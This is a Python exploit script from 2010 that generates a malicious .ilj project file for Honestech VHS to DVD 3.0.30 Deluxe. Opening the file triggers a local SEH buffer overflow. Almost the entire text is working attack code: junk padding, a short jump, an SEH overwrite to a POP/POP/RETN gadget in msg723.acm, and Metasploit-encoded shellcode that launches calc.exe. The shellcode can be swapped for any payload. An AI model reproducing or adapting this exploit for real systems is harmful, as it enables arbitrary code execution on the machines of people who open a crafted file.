Honestech VHS To DVD 3.0.30 Deluxe Buffer Overflow

`#!/usr/bin/python  
#  
# Exploit Title: Honestech VHS to DVD <= 3.0.30 Deluxe Local Buffer Overflow (SEH)  
# Date: September 16, 2010  
# Author: Brennon Thomas [email protected]  
# Software Link: n/a  
# Version: <= 3.0.30.0 Deluxe  
# Tested on: Windows XP SP2/SP3 using Honestech VHS to DVD 3.0.2 and 3.0.30.0  
#  
# Usage: This python script generates the malicious .ilj project file.  
# Open Honestech VHS to DVD <= 3.0.30 Deluxe in Advanced mode and  
# load the corrupt file.  
#  
# Exploit is for education purposes only. Author takes no responsibility  
# for what you do with it.  
  
#Required file text  
buf = "\r\n\  
\r\n\  
<CAPTURE>\r\n\  
\r\n\  
[MAINDLG]\r\n\  
PAGE=0\r\n\  
\r\n\  
[AVICODEC]\r\n\  
VIDEOCODEC=DivX 6.8.5 Codec (2 Logical CPUs)\r\n\  
AUDIOCODEC=MPEG Layer-3\r\n\  
\r\n\  
[WMVINFO]\r\n\  
TITLE= \r\n\  
AUTHOR= \r\n\  
COPYRIGHT= \r\n\  
DESCRIPTION= \r\n\  
\r\n\  
[CAPTUREINFO]\r\n\  
OUTPUTFOLDER=E:\\misc\\\r\n\  
STATE=0,1,1,0,4396,4,1,0,0\r\n\  
\r\n\  
[BURNINFO]\r\n\  
STATE=0,0,0,0,0,0\r\n\  
TEMPFOLDER=E:\\misc\\\r\n\  
VIDEOTSFOLDER=E:\\misc\\\r\n\  
IMAGEFOLDER=E:\\misc\\\r\n\  
\r\n\  
[FILELIST]\r\n\  
FILE=E:\\"  
  
buf += "\x90"*257 #Junk  
buf += "\xeb\x08\x90\x90" #JMP SHORT 8, NOP Padding  
buf += "\xba\x25\x31\x58" #SEH Overwrite to POP,POP,RETN in msg723.acm  
buf += "\x90"*16 #NOP Buffer  
  
#msfpayload windows/exec CMD=calc.exe R | msfencode -a x86 -b '\x00\x0a\x0d\x2c' -t c  
#[*] x86/shikata_ga_nai succeeded with size 228 (iteration=1)  
buf += ("\xbe\xf9\x89\xfa\xaa\xdb\xca\xd9\x74\x24\xf4\x33\xc9\xb1\x33"  
"\x5d\x31\x75\x13\x83\xed\xfc\x03\x75\xf6\x6b\x0f\x56\xe0\xe5"  
"\xf0\xa7\xf0\x95\x79\x42\xc1\x87\x1e\x06\x73\x18\x54\x4a\x7f"  
"\xd3\x38\x7f\xf4\x91\x94\x70\xbd\x1c\xc3\xbf\x3e\x91\xcb\x6c"  
"\xfc\xb3\xb7\x6e\xd0\x13\x89\xa0\x25\x55\xce\xdd\xc5\x07\x87"  
"\xaa\x77\xb8\xac\xef\x4b\xb9\x62\x64\xf3\xc1\x07\xbb\x87\x7b"  
"\x09\xec\x37\xf7\x41\x14\x3c\x5f\x72\x25\x91\x83\x4e\x6c\x9e"  
"\x70\x24\x6f\x76\x49\xc5\x41\xb6\x06\xf8\x6d\x3b\x56\x3c\x49"  
"\xa3\x2d\x36\xa9\x5e\x36\x8d\xd3\x84\xb3\x10\x73\x4f\x63\xf1"  
"\x85\x9c\xf2\x72\x89\x69\x70\xdc\x8e\x6c\x55\x56\xaa\xe5\x58"  
"\xb9\x3a\xbd\x7e\x1d\x66\x66\x1e\x04\xc2\xc9\x1f\x56\xaa\xb6"  
"\x85\x1c\x59\xa3\xbc\x7e\x34\x32\x4c\x05\x71\x34\x4e\x06\xd2"  
"\x5c\x7f\x8d\xbd\x1b\x80\x44\xfa\xd3\xca\xc5\xab\x7b\x93\x9f"  
"\xe9\xe6\x24\x4a\x2d\x1e\xa7\x7f\xce\xe5\xb7\xf5\xcb\xa2\x7f"  
"\xe5\xa1\xbb\x15\x09\x15\xbc\x3f\x6a\xf8\x2e\xa3\x43\x9f\xd6"  
"\x46\x9c\x55")  
  
buf += "\x90"*(6000-(len(buf))) #NOP Buffer  
buf += ",0,7462,885953024,4,1,640,480\r\n" #Required file text  
  
f = open("sploit.ilj", "w")  
f.write(buf)  
f.close()  
  
`